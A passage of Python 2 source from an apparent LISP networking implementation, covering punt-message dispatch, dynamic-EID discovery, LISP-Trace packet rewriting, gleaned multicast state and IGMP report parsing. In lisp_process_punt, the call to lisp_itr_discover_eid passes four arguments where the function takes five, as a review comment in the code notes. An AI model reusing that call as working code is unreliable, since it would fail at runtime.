            msg[key_name]["seconds-last-packet"]
        lisp_decap_stats[key_name].last_increment = lisp_get_timestamp() - ts
    #endfor
    return
#enddef
#
# lisp_process_punt
#
# Another data-plane is punting a packet to us so we can discover a source
# EID, send a map-request, or store statistics data. The format of the JSON
# messages are for types: "discovery", "restart", "statistics", and "decap-
# statistics". This function calls functions for the stats and restart types
# but this function processes logic for:
#
# { "type" : "discovery", "source-eid" : <eid-source-address>,
# "dest-eid" : <eid-dest-address>, "interface" : "<device-name>",
# "instance-id" : <iid> }
#
# And:
#
def lisp_process_punt(punt_socket, lisp_send_sockets, lisp_ephem_port):
    """
    Receive and dispatch a JSON punt message from another data-plane.
    "statistics", "decap-statistics" and "restart" messages are handed to
    their processing functions; "discovery" messages drive dynamic
    source-EID discovery and destination Map-Request generation.
    """
    message, source = punt_socket.recvfrom(4000)
    msg = json.loads(message)
    if (type(msg) != dict):
        lprint("Invalid punt message from {}, not in JSON format". \
            format(source))
        return
    #endif

    punt = bold("Punt", False)
    lprint("{} message from '{}': '{}'".format(punt, source, msg))

    if (msg.has_key("type") == False):
        lprint("Punt IPC message has no 'type' key")
        return
    #endif

    #
    # Process statistics messages.
    #
    if (msg["type"] == "statistics"):
        lisp_process_data_plane_stats(msg, lisp_send_sockets, lisp_ephem_port)
        return
    #endif
    if (msg["type"] == "decap-statistics"):
        lisp_process_data_plane_decap_stats(msg, punt_socket)
        return
    #endif

    #
    # Process restart message.
    #
    if (msg["type"] == "restart"):
        lisp_process_data_plane_restart()
        return
    #endif

    #
    # Process possible punt packet discovery message.
    #
    if (msg["type"] != "discovery"):
        lprint("Punt IPC message has wrong format")
        return
    #endif
    if (msg.has_key("interface") == False):
        lprint("Invalid punt message from {}, required keys missing". \
            format(source))
        return
    #endif

    #
    # Drop control-messages designated as instance-ID 0xffffff (or -1 in
    # JSON). An empty interface name means the instance-ID is carried in
    # the message itself; otherwise it is derived from the interface.
    #
    device = msg["interface"]
    if (device == ""):
        iid = int(msg["instance-id"])
        if (iid == -1): return
    else:
        iid = lisp_get_interface_instance_id(device, None)
    #endif

    #
    # Validate EID format.
    #
    seid = None
    if (msg.has_key("source-eid")):
        source_eid = msg["source-eid"]
        seid = lisp_address(LISP_AFI_NONE, source_eid, 0, iid)
        if (seid.is_null()):
            lprint("Invalid source-EID format '{}'".format(source_eid))
            return
        #endif
    #endif
    deid = None
    if (msg.has_key("dest-eid")):
        dest_eid = msg["dest-eid"]
        deid = lisp_address(LISP_AFI_NONE, dest_eid, 0, iid)
        if (deid.is_null()):
            lprint("Invalid dest-EID format '{}'".format(dest_eid))
            return
        #endif
    #endif

    #
    # Do source-EID discovery.
    #
    # Make sure we have a configured database-mapping entry for this EID.
    #
    if (seid):
        e = green(seid.print_address(), False)
        db = lisp_db_for_lookups.lookup_cache(seid, False)
        if (db != None):
            #
            # Check accept policy and if accepted, discover EID by putting
            # in discovery cache. ETR will register it.
            #
            if (db.dynamic_eid_configured()):
                interface = lisp_allow_dynamic_eid(device, seid)
                if (interface != None and lisp_i_am_itr):
                    # NOTE(review): lisp_itr_discover_eid() is defined with
                    # 5 parameters (including lisp_ipc_listen_socket) but is
                    # called here with 4 — confirm which version of the
                    # helper this call site expects.
                    lisp_itr_discover_eid(db, seid, device, interface)
                else:
                    lprint(("Disallow dynamic source-EID {} " + \
                        "on interface {}").format(e, device))
                #endif
            #endif
        else:
            lprint("Punt from non-EID source {}".format(e))
        #endif
    #endif

    #
    # Do Map-Request processing on destination.
    #
    if (deid):
        mc = lisp_map_cache_lookup(seid, deid)
        if (mc == None or mc.action == LISP_SEND_MAP_REQUEST_ACTION):
            #
            # Check if we should rate-limit Map-Request and if not send
            # Map-Request.
            #
            if (lisp_rate_limit_map_request(seid, deid)): return
            lisp_send_map_request(lisp_send_sockets, lisp_ephem_port,
                seid, deid, None)
        else:
            e = green(deid.print_address(), False)
            lprint("Map-cache entry for {} already exists".format(e))
        #endif
    #endif
    return
#enddef
#
# lisp_ipc_map_cache_entry
#
# Callback from class lisp_cache.walk_cache().
#
def lisp_ipc_map_cache_entry(mc, jdata):
    """
    lisp_cache.walk_cache() callback: serialize one map-cache entry (via
    lisp_write_ipc_map_cache with dont_send=True) and append it to the
    'jdata' list. Always returns [True, jdata] to continue the walk.
    """
    jdata.append(lisp_write_ipc_map_cache(True, mc, dont_send=True))
    return([True, jdata])
#enddef
#
# lisp_ipc_walk_map_cache
#
# Walk the entries in the lisp_map_cache(). And then subsequently walk the
# entries in lisp_mapping.source_cache().
#
def lisp_ipc_walk_map_cache(mc, jdata):
    """
    Walk callback over lisp_map_cache entries. Destination-only entries are
    serialized directly; (source, group) entries walk their source_cache so
    every source under the group is serialized too.
    """
    if (mc.group.is_null() == False):
        #
        # (source, group) state: walk all sources for this group entry.
        #
        if (mc.source_cache == None): return([True, jdata])
        jdata = mc.source_cache.walk_cache(lisp_ipc_map_cache_entry, jdata)
        return([True, jdata])
    #endif

    #
    # There is only destination state in this map-cache entry.
    #
    return(lisp_ipc_map_cache_entry(mc, jdata))
#enddef
#
# lisp_itr_discover_eid
#
# Put dynamic-EID in db.dynamic_eids{} array.
#
def lisp_itr_discover_eid(db, eid, input_interface, routed_interface,
    lisp_ipc_listen_socket):
    """
    Record a discovered dynamic-EID in db.dynamic_eids{} and notify the
    lisp-etr process (via IPC) so it can register the EID. A re-discovered
    EID only has its last-packet timestamp refreshed.
    """
    key = eid.print_address()

    #
    # Already known -- just refresh the activity timestamp.
    #
    if (key in db.dynamic_eids):
        db.dynamic_eids[key].last_packet = lisp_get_timestamp()
        return
    #endif

    #
    # First sighting -- build and store a new dynamic-EID entry.
    #
    entry = lisp_dynamic_eid()
    entry.dynamic_eid.copy_address(eid)
    entry.interface = routed_interface
    entry.last_packet = lisp_get_timestamp()
    entry.get_timeout(routed_interface)
    db.dynamic_eids[key] = entry

    suffix = ""
    if (input_interface != routed_interface):
        suffix = ", routed-interface " + routed_interface
    #endif

    eid_string = green(key, False) + bold(" discovered", False)
    lprint("Dynamic-EID {} on interface {}{}, timeout {}".format( \
        eid_string, input_interface, suffix, entry.timeout))

    #
    # Tell ETR process so it can register dynamic-EID.
    #
    ipc = lisp_command_ipc("learn%{}%{}".format(key, routed_interface),
        "lisp-itr")
    lisp_ipc(ipc, lisp_ipc_listen_socket, "lisp-etr")
    return
#enddef
#
# lisp_retry_decap_keys
#
# A decap-key was copied from x.x.x.x:p to x.x.x.x, but it was the wrong one.
# Copy x.x.x.x:q to x.x.x.x. This is an expensive function. But it is hardly
# used. And once it is used for a particular addr_str, it shouldn't be used
# again.
#
# This function is only used when an ICV error occurs when x.x.x.x is the
# crypto-key used.
#
def lisp_retry_decap_keys(addr_str, packet, iv, packet_icv):
    """
    After an ICV failure on the port-less decap key for 'addr_str', search
    the other "<addr_str>:<port>" decap entries for a key whose ICV check
    passes on this packet, and install that entry as the new port-less key.
    No-op unless lisp_search_decap_keys is enabled.
    """
    if (lisp_search_decap_keys == False): return

    #
    # Only use this function when the key matched was not port based.
    #
    if (addr_str.find(":") != -1): return

    parent = lisp_crypto_keys_by_rloc_decap[addr_str]
    for key in lisp_crypto_keys_by_rloc_decap:
        #
        # Find entry that has same source RLOC.
        #
        if (key.find(addr_str) == -1): continue

        #
        # Skip over parent entry.
        #
        if (key == addr_str): continue

        #
        # If crypto-keys the same, go to find next one.
        #
        entry = lisp_crypto_keys_by_rloc_decap[key]
        if (entry == parent): continue

        #
        # Try ICV check. If works, then go to this key.
        # NOTE(review): entry[1] is assumed to hold the unicast crypto key
        # for this RLOC entry — confirm against the key-list layout.
        #
        crypto_key = entry[1]
        if (packet_icv != crypto_key.do_icv(packet, iv)):
            lprint("Test ICV with key {} failed".format(red(key, False)))
            continue
        #endif

        # Replacing the value of an existing key is safe while iterating;
        # the loop continues so a later key could overwrite this choice.
        lprint("Changing decap crypto key to {}".format(red(key, False)))
        lisp_crypto_keys_by_rloc_decap[addr_str] = entry
    #endfor
    return
#enddef
#
# lisp_decent_pull_xtr_configured
#
# Return True if configured LISP-Decent modulus is not 0. Meaning we are using
# the LISP-Decent pull-based mapping system.
#
def lisp_decent_pull_xtr_configured():
    """
    Return True when the LISP-Decent pull-based mapping system is
    configured, i.e. a non-zero modulus and a DNS suffix are both set.
    """
    if (lisp_decent_modulus == 0): return(False)
    return(lisp_decent_dns_suffix != None)
#enddef
#
# lisp_is_decent_dns_suffix
#
# Return True if supplied DNS name ends with a configured LISP-Decent DNS
# suffix.
#
def lisp_is_decent_dns_suffix(dns_name):
    """
    Return True when 'dns_name', with its first label removed, equals the
    configured LISP-Decent DNS suffix. False when no suffix is configured.
    """
    if (lisp_decent_dns_suffix == None): return(False)

    # Drop everything up to and including the first "." — a name with no
    # dot yields "" here, matching no configured suffix.
    remainder = dns_name.partition(".")[2]
    return(remainder == lisp_decent_dns_suffix)
#enddef
#
# lisp_get_decent_index
#
# Hash the EID-prefix and mod the configured LISP-Decent modulus value.
#
def lisp_get_decent_index(eid):
    """
    Map an EID-prefix to a LISP-Decent index: SHA-256 the printed prefix
    and reduce the digest modulo the configured lisp_decent_modulus.
    """
    digest = hashlib.sha256(eid.print_prefix()).hexdigest()
    return(int(digest, 16) % lisp_decent_modulus)
#enddef
#
# lisp_get_decent_dns_name
#
# Based on EID, get index and prepend to LISP-Decent DNS name suffix.
#
def lisp_get_decent_dns_name(eid):
    """
    Build the LISP-Decent DNS name for an EID: its decent index prepended
    to the configured DNS suffix.
    """
    return("{}.{}".format(lisp_get_decent_index(eid), lisp_decent_dns_suffix))
#enddef
#
# lisp_get_decent_dns_name_from_str
#
# The supplied EID is passed as a string. Build an internal
# lisp_address() to pass into lisp_get_decent_index().
#
def lisp_get_decent_dns_name_from_str(iid, eid_str):
    """
    Build the LISP-Decent DNS name from an EID given as a string plus an
    instance-ID: wrap it in a lisp_address(), take its decent index, and
    prepend that to the configured DNS suffix.
    """
    eid = lisp_address(LISP_AFI_NONE, eid_str, 0, iid)
    return("{}.{}".format(lisp_get_decent_index(eid), lisp_decent_dns_suffix))
#enddef
#
# lisp_trace_append
#
# Append JSON data to trace packet. If this is the ETR, the EIDs will be
# swapped to return packet to originator.
#
# Returning False means the caller should return (and not forward the packet).
#
def lisp_trace_append(packet, reason=None, ed="encap", lisp_socket=None,
    rloc_entry=None):
    """
    Append this node's entry to the JSON payload of a LISP-Trace packet and
    rewrite the packet in place (lengths and checksums fixed up). When this
    node is the destination EID's ETR, the inner addresses are swapped so
    the trace returns to the originator. Returns True when the caller
    should forward the packet, False when it should not (decode failure, or
    the packet was returned to the sender because the next RLOC is
    unknown).
    """
    # Offset of the trace payload past inner IP (20 or 40 bytes) + UDP (8).
    offset = 28 if packet.inner_version == 4 else 48
    trace_pkt = packet.packet[offset::]

    trace = lisp_trace()
    if (trace.decode(trace_pkt) == False):
        lprint("Could not decode JSON portion of a LISP-Trace packet")
        return(False)
    #endif

    next_rloc = "?" if packet.outer_dest.is_null() else \
        packet.outer_dest.print_address_no_iid()

    #
    # Display port if the caller is an encapsulating RTR using a translated
    # RLOC.
    #
    if (next_rloc != "?" and packet.encap_port != LISP_DATA_PORT):
        if (ed == "encap"): next_rloc += ":{}".format(packet.encap_port)
    #endif

    #
    # Add node entry data for the encapsulation or decapsulation.
    #
    entry = {}
    entry["node"] = "ITR" if lisp_i_am_itr else "ETR" if lisp_i_am_etr else \
        "RTR" if lisp_i_am_rtr else "?"
    srloc = packet.outer_source
    if (srloc.is_null()): srloc = lisp_myrlocs[0]
    entry["srloc"] = srloc.print_address_no_iid()

    #
    # In the source RLOC include the ephemeral port number of the ltr client
    # so RTRs can return errors to the client behind a NAT.
    #
    if (entry["node"] == "ITR" and packet.inner_sport != LISP_TRACE_PORT):
        entry["srloc"] += ":{}".format(packet.inner_sport)
    #endif

    entry["hn"] = lisp_hostname
    # Timestamp key is "encap-ts" or "decap-ts" depending on direction.
    key = ed + "-ts"
    entry[key] = lisp_get_timestamp()

    #
    # If this is a ETR decap entry and the drloc is "?", the packet came in
    # on lisp_etr_nat_data_plane() where the kernel strips the outer header.
    # Get the local/private RLOC from our database-mapping.
    #
    if (next_rloc == "?" and entry["node"] == "ETR"):
        db = lisp_db_for_lookups.lookup_cache(packet.inner_dest, False)
        if (db != None and len(db.rloc_set) >= 1):
            next_rloc = db.rloc_set[0].rloc.print_address_no_iid()
        #endif
    #endif
    entry["drloc"] = next_rloc

    #
    # If there is a reason there is no dest RLOC, include it.
    #
    if (next_rloc == "?" and reason != None):
        entry["drloc"] += " ({})".format(reason)
    #endif

    #
    # Add recent-rtts and recent-hops.
    #
    if (rloc_entry != None):
        entry["rtts"] = rloc_entry.recent_rloc_probe_rtts
        entry["hops"] = rloc_entry.recent_rloc_probe_hops
    #endif

    #
    # Build seid->deid record if it does not exist. Then append node entry
    # to record below, in the search loop.
    #
    seid = packet.inner_source.print_address()
    deid = packet.inner_dest.print_address()
    if (trace.packet_json == []):
        rec = {}
        rec["seid"] = seid
        rec["deid"] = deid
        rec["paths"] = []
        trace.packet_json.append(rec)
    #endif

    #
    # Search for record. If we are appending the first ITR node entry, get
    # its RLOC address in case we have to return-to-sender.
    #
    for rec in trace.packet_json:
        if (rec["deid"] != deid): continue
        rec["paths"].append(entry)
        break
    #endfor

    #
    # If we are destination-EID, add a new record deid->seid if we have not
    # completed a round-trip. The ETR will deliver this packet from its own
    # EID which means the co-located ITR will pcap the packet and add its
    # encap node entry.
    #
    swap = False
    if (len(trace.packet_json) == 1 and entry["node"] == "ETR" and
        trace.myeid(packet.inner_dest)):
        rec = {}
        rec["seid"] = deid
        rec["deid"] = seid
        rec["paths"] = []
        trace.packet_json.append(rec)
        swap = True
    #endif

    #
    # Print the JSON packet after we appended data to it. Put the new JSON
    # in packet. Fix up lengths and checksums from inner headers.
    #
    trace.print_trace()
    trace_pkt = trace.encode()

    #
    # If next_rloc is not known, we need to return packet to sender.
    #
    # Otherwise we are forwarding a packet that is about to be encapsulated
    # or we are forwarding a packet that was just decapsulated with the
    # addresses swapped so we can turn it around.
    #
    sender_rloc = trace.packet_json[0]["paths"][0]["srloc"]
    if (next_rloc == "?"):
        lprint("LISP-Trace return to sender RLOC {}".format(sender_rloc))
        trace.return_to_sender(lisp_socket, sender_rloc, trace_pkt)
        return(False)
    #endif

    #
    # Compute length of trace packet. This includes the UDP header, Trace
    # header, and JSON payload.
    #
    udplen = trace.packet_length()

    #
    # Fix up UDP length and recompute UDP checksum if IPv6 packet, zero
    # otherwise. Only do checksum when the Trace went round-trip and this
    # is the local ETR delivery EID-based Trace packet to the client ltr.
    #
    headers = packet.packet[0:offset]
    # Overwrite the UDP length/checksum fields (last 4 bytes of headers).
    p = struct.pack("HH", socket.htons(udplen), 0)
    headers = headers[0:offset-4] + p
    if (packet.inner_version == 6 and entry["node"] == "ETR" and
        len(trace.packet_json) == 2):
        udp = headers[offset-8::] + trace_pkt
        udp = lisp_udp_checksum(seid, deid, udp)
        headers = headers[0:offset-8] + udp[0:8]
    #endif

    #
    # If we are swapping addresses, do it here so the JSON append and IP
    # header fields changes are all reflected in new IPv4 header checksum.
    #
    if (swap):
        # Exchange the source/destination address fields and the UDP port
        # fields in the inner IPv4 (or IPv6) + UDP headers.
        if (packet.inner_version == 4):
            headers = headers[0:12] + headers[16:20] + headers[12:16] + \
                headers[22:24] + headers[20:22] + headers[24::]
        else:
            headers = headers[0:8] + headers[24:40] + headers[8:24] + \
                headers[42:44] + headers[40:42] + headers[44::]
        #endif
        d = packet.inner_dest
        packet.inner_dest = packet.inner_source
        packet.inner_source = d
    #endif

    #
    # Fix up IP length. 'offset' is reused here as the byte offset of the
    # IP length field (2 for IPv4 total-length, 4 for IPv6 payload-length).
    #
    offset = 2 if packet.inner_version == 4 else 4
    iplen = 20 + udplen if packet.inner_version == 4 else udplen
    h = struct.pack("H", socket.htons(iplen))
    headers = headers[0:offset] + h + headers[offset+2::]

    #
    # Fix up IPv4 header checksum (zero the field, then recompute).
    #
    if (packet.inner_version == 4):
        c = struct.pack("H", 0)
        headers = headers[0:10] + c + headers[12::]
        h = lisp_ip_checksum(headers[0:20])
        headers = h + headers[20::]
    #endif

    #
    # Caller is forwarding packet, either as an ITR, RTR, or ETR.
    #
    packet.packet = headers + trace_pkt
    return(True)
#enddef
#
# lisp_allow_gleaning
#
# Check the lisp_glean_mapping array to see if we should glean the EID and
# RLOC. Find first match. Return False if there are no configured glean
# mappings. The second return value is either True or False depending if the
# matched entry was configured to RLOC-probe the RLOC for the gleaned entry.
#
def lisp_allow_gleaning(eid, group, rloc):
    """
    Match (eid, group, rloc) against the configured lisp_glean_mappings
    and return a 3-tuple: (allowed, rloc-probe?, igmp-query?). The first
    matching entry wins; (False, False, False) when nothing matches or no
    glean mappings are configured. 'group' and 'rloc' may be None, in
    which case entries requiring them are skipped or pass respectively.
    """
    if (lisp_glean_mappings == []): return(False, False, False)

    for mapping in lisp_glean_mappings:
        if ("instance-id" in mapping):
            low, high = mapping["instance-id"]
            if (eid.instance_id < low or eid.instance_id > high): continue
        #endif
        if ("eid-prefix" in mapping):
            # Deep-copy so setting the instance-id for the more-specific
            # test does not modify the configured prefix.
            prefix = copy.deepcopy(mapping["eid-prefix"])
            prefix.instance_id = eid.instance_id
            if (eid.is_more_specific(prefix) == False): continue
        #endif
        if ("group-prefix" in mapping):
            if (group == None): continue
            prefix = copy.deepcopy(mapping["group-prefix"])
            prefix.instance_id = group.instance_id
            if (group.is_more_specific(prefix) == False): continue
        #endif
        if ("rloc-prefix" in mapping):
            if (rloc != None):
                if (rloc.is_more_specific(mapping["rloc-prefix"]) == False):
                    continue
                #endif
            #endif
        #endif
        return(True, mapping["rloc-probe"], mapping["igmp-query"])
    #endfor
    return(False, False, False)
#enddef
#
# lisp_build_gleaned_multicast
#
# Build (*,G) map-cache entry in RTR with gleaned RLOC info from IGMP report.
#
def lisp_build_gleaned_multicast(seid, geid, rloc, port, igmp):
    """
    Build or update a gleaned (*,G) map-cache entry on the RTR, adding or
    refreshing the RLE node for 'seid' with the gleaned RLOC and translated
    port. When 'igmp' is True the (seid, group) join timestamp is refreshed
    in lisp_gleaned_groups{} so actively joined groups do not time out.
    """
    group_str = geid.print_address()
    seid_name = seid.print_address_no_iid()
    s = green("{}".format(seid_name), False)
    e = green("(*, {})".format(group_str), False)
    r = red(rloc.print_address_no_iid() + ":" + str(port), False)

    #
    # Support (*,G) only gleaning. Scales better anyway.
    #
    mc = lisp_map_cache_lookup(seid, geid)
    if (mc == None):
        # Build a new (*,G) entry: group in both eid/group fields, with the
        # eid address/mask zeroed to make it a star (wildcard) source.
        mc = lisp_mapping("", "", [])
        mc.group.copy_address(geid)
        mc.eid.copy_address(geid)
        mc.eid.address = 0
        mc.eid.mask_len = 0
        mc.mapping_source.copy_address(rloc)
        mc.map_cache_ttl = LISP_IGMP_TTL
        mc.gleaned = True
        mc.add_cache()
        lprint("Add gleaned EID {} to map-cache".format(e))
    #endif

    #
    # Check to see if RLE node exists. If so, update the RLE node RLOC and
    # encap-port.
    #
    rloc_entry = rle_entry = rle_node = None
    if (mc.rloc_set != []):
        rloc_entry = mc.rloc_set[0]
        if (rloc_entry.rle):
            rle_entry = rloc_entry.rle
            for rn in rle_entry.rle_nodes:
                if (rn.rloc_name != seid_name): continue
                rle_node = rn
                break
            #endfor
        #endif
    #endif

    #
    # Adding RLE to existing rloc-set or create new one.
    #
    if (rloc_entry == None):
        rloc_entry = lisp_rloc()
        mc.rloc_set = [rloc_entry]
        # Low priority (253) so gleaned RLEs do not preempt configured
        # unicast RLOCs.
        rloc_entry.priority = 253
        rloc_entry.mpriority = 255
        mc.build_best_rloc_set()
    #endif
    if (rle_entry == None):
        rle_entry = lisp_rle(geid.print_address())
        rloc_entry.rle = rle_entry
    #endif
    if (rle_node == None):
        rle_node = lisp_rle_node()
        rle_node.rloc_name = seid_name
        rle_entry.rle_nodes.append(rle_node)
        rle_entry.build_forwarding_list()
        lprint("Add RLE {} from {} for gleaned EID {}".format(r, s, e))
    elif (rloc.is_exact_match(rle_node.address) == False or
        port != rle_node.translated_port):
        lprint("Changed RLE {} from {} for gleaned EID {}".format(r, s, e))
    #endif

    #
    # Add or update.
    #
    rle_node.store_translated_rloc(rloc, port)

    #
    # An IGMP report was received. Update timestamp so we don't time out
    # actively joined groups.
    #
    if (igmp):
        seid_str = seid.print_address()
        if (lisp_gleaned_groups.has_key(seid_str) == False):
            lisp_gleaned_groups[seid_str] = {}
        #endif
        lisp_gleaned_groups[seid_str][group_str] = lisp_get_timestamp()
    #endif
#enddef
#
# lisp_remove_gleaned_multicast
#
# Remove an RLE from a gleaned entry since an IGMP Leave message was received.
#
def lisp_remove_gleaned_multicast(seid, geid):
    """
    Remove seid's RLE node from the gleaned (*,G) map-cache entry after an
    IGMP Leave, drop the (seid, group) join record, and delete the whole
    map-cache entry when no RLE nodes remain.
    """
    #
    # Support (*,G) only gleaning. Scales better anyway.
    #
    mc = lisp_map_cache_lookup(seid, geid)
    if (mc == None): return

    rle = mc.rloc_set[0].rle
    if (rle == None): return

    rloc_name = seid.print_address_no_iid()
    found = False
    for rle_node in rle.rle_nodes:
        if (rle_node.rloc_name == rloc_name):
            found = True
            break
        #endif
    #endfor
    if (found == False): return

    #
    # Found entry to remove. 'rle_node' still references the matched node.
    #
    rle.rle_nodes.remove(rle_node)
    rle.build_forwarding_list()

    group_str = geid.print_address()
    seid_str = seid.print_address()
    s = green("{}".format(seid_str), False)
    e = green("(*, {})".format(group_str), False)
    lprint("Gleaned EID {} RLE removed for {}".format(e, s))

    #
    # Remove record that this EID has joined the group.
    #
    if (lisp_gleaned_groups.has_key(seid_str)):
        if (lisp_gleaned_groups[seid_str].has_key(group_str)):
            lisp_gleaned_groups[seid_str].pop(group_str)
        #endif
    #endif

    #
    # Remove map-cache entry if no more RLEs present.
    #
    if (rle.rle_nodes == []):
        mc.delete_cache()
        lprint("Gleaned EID {} remove, no more RLEs".format(e))
    #endif
#enddef
#
# lisp_change_gleaned_multicast
#
# Change RLOC for each gleaned group this EID has joined.
#
def lisp_change_gleaned_multicast(seid, rloc, port):
    """
    The gleaned RLOC/port for 'seid' changed: rebuild the RLE for every
    group this EID has joined (tracked in lisp_gleaned_groups{}), reusing
    the module-level lisp_geid scratch address.
    """
    key = seid.print_address()
    if (key not in lisp_gleaned_groups): return

    for group_str in lisp_gleaned_groups[key]:
        lisp_geid.store_address(group_str)
        lisp_build_gleaned_multicast(seid, lisp_geid, rloc, port, False)
    #endfor
#enddef
#
# lisp_process_igmp_packet
#
# Process IGMP packets.
#
# Basically odd types are Joins and even types are Leaves.
#
#
# An IGMPv1 and IGMPv2 report format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Version| Type | Unused | Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Group Address |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# An IGMPv3 report format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 0x22 | Reserved | Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reserved | Number of Group Records (M) |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# . .
# . Group Record [1] .
# . .
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# . .
# . Group Record [2] .
# . .
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . |
# . . .
# | . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# . .
# . Group Record [M] .
# . .
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# An IGMPv3 group record format is:
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Record Type | Aux Data Len | Number of Sources (N) |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Multicast Address |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Source Address [1] |
# +- -+
# | Source Address [2] |
# +- -+
# . . .
# . . .
# . . .
# +- -+
# | Source Address [N] |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# . .
# . Auxiliary Data .
# . .
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
#
# The function returns a boolean (True) when packet is an IGMP query and
# an array when it is a report. Caller must check whether there is context
# to deal with IGMP queries.
#
# IMPORTANT NOTE: for encapsulated IGMP Queries to be forwarded correctly
# after the ETR decapsulates them, you need this in the kernel (put this
# statement in the RL script):
#
# ip route add 224.0.0.1/32 dev lo
#
# For OOR running as a LISP-MN use:
#
# ip route add 224.0.0.1/32 dev utun4
#
# IGMP message type-codes used for logging unsupported types in
# lisp_process_igmp_packet() (17 = 0x11 query, 18 = 0x12 v1-report,
# 22 = 0x16 v2-report, 23 = 0x17 v2-leave, 34 = 0x22 v3-report).
igmp_types = { 17 : "IGMP-query", 18 : "IGMPv1-report", 19 : "DVMRP",
    20 : "PIMv1", 22 : "IGMPv2-report", 23 : "IGMPv2-leave",
    30 : "mtrace-response", 31 : "mtrace-request", 34 : "IGMPv3-report" }

# IGMPv3 group-record types (record type 1..6) used when parsing
# IGMPv3 reports.
lisp_igmp_record_types = { 1 : "include-mode", 2 : "exclude-mode",
    3 : "change-to-include", 4 : "change-to-exclude", 5 : "allow-new-source",
    6 : "block-old-sources" }
def lisp_process_igmp_packet(packet):
    """
    Parse a received IGMP packet (IP header included).

    Returns True when the packet is an IGMP Query; the caller must decide
    whether it has context to handle queries. Otherwise returns an array of
    [source, group, joinleave] entries where source is None for (*,G) state,
    group is a group address string and joinleave is True for a join, False
    for a leave. Unsupported or malformed messages return an empty array.
    """
    source = lisp_address(LISP_AFI_IPV4, "", 32, 0)
    source.address = socket.ntohl(struct.unpack("I", packet[12:16])[0])
    source = bold("from {}".format(source.print_address_no_iid()), False)

    r = bold("Receive", False)
    lprint("{} {}-byte {}, IGMP packet: {}".format(r, len(packet), source,
        lisp_format_packet(packet)))

    #
    # Jump over IP header (IHL is in units of 32-bit words).
    #
    header_offset = (struct.unpack("B", packet[0])[0] & 0x0f) * 4

    #
    # Check for IGMPv3 type value 0x22. Or process an IGMPv2 report.
    #
    igmp = packet[header_offset::]
    igmp_type = struct.unpack("B", igmp[0])[0]

    #
    # Maybe this is an IGMPv1 or IGMPv2 message so get group address. If
    # IGMPv3, we will fix up group address in loop (for each group record).
    #
    group = lisp_address(LISP_AFI_IPV4, "", 32, 0)
    group.address = socket.ntohl(struct.unpack("II", igmp[:8])[1])
    group_str = group.print_address_no_iid()

    if (igmp_type == 17):
        lprint("IGMP Query for group {}".format(group_str))
        return(True)
    #endif

    reports_and_leaves_only = (igmp_type in (0x12, 0x16, 0x17, 0x22))
    if (reports_and_leaves_only == False):

        #
        # Use "in" rather than py2-only dict.has_key() so this also runs
        # under python3.
        #
        igmp_str = "{} ({})".format(igmp_type, igmp_types[igmp_type]) if \
            (igmp_type in igmp_types) else igmp_type
        lprint("IGMP type {} not supported".format(igmp_str))
        return([])
    #endif

    if (len(igmp) < 8):
        lprint("IGMP message too small")
        return([])
    #endif

    #
    # Process either IGMPv1 or IGMPv2 and exit.
    #
    if (igmp_type == 0x17):
        lprint("IGMPv2 leave (*, {})".format(bold(group_str, False)))
        return([[None, group_str, False]])
    #endif
    if (igmp_type in (0x12, 0x16)):
        lprint("IGMPv{} join (*, {})".format( \
            1 if (igmp_type == 0x12) else 2, bold(group_str, False)))

        #
        # Suppress for link-local groups.
        #
        if (group_str.find("224.0.0.") != -1):
            lprint("Suppress registration for link-local groups")
        else:
            return([[None, group_str, True]])
        #endif

        #
        # Finished with IGMPv1 or IGMPv2 processing.
        #
        return([])
    #endif

    #
    # Parse each record for IGMPv3 (igmp_type == 0x22). The record count
    # comes from the second 32-bit word (the high-order 16-bits are
    # reserved; per RFC 3376 they are transmitted as zero).
    #
    record_count = group.address
    igmp = igmp[8::]
    group_format = "BBHI"
    group_size = struct.calcsize(group_format)
    source_format = "I"
    source_size = struct.calcsize(source_format)
    source = lisp_address(LISP_AFI_IPV4, "", 32, 0)

    #
    # Traverse each group record.
    #
    register_entries = []
    for i in range(record_count):

        #
        # Truncated packet, return entries parsed so far. Returning None
        # here would crash callers that iterate over the result.
        #
        if (len(igmp) < group_size): return(register_entries)

        record_type, x, source_count, address = struct.unpack(group_format,
            igmp[:group_size])
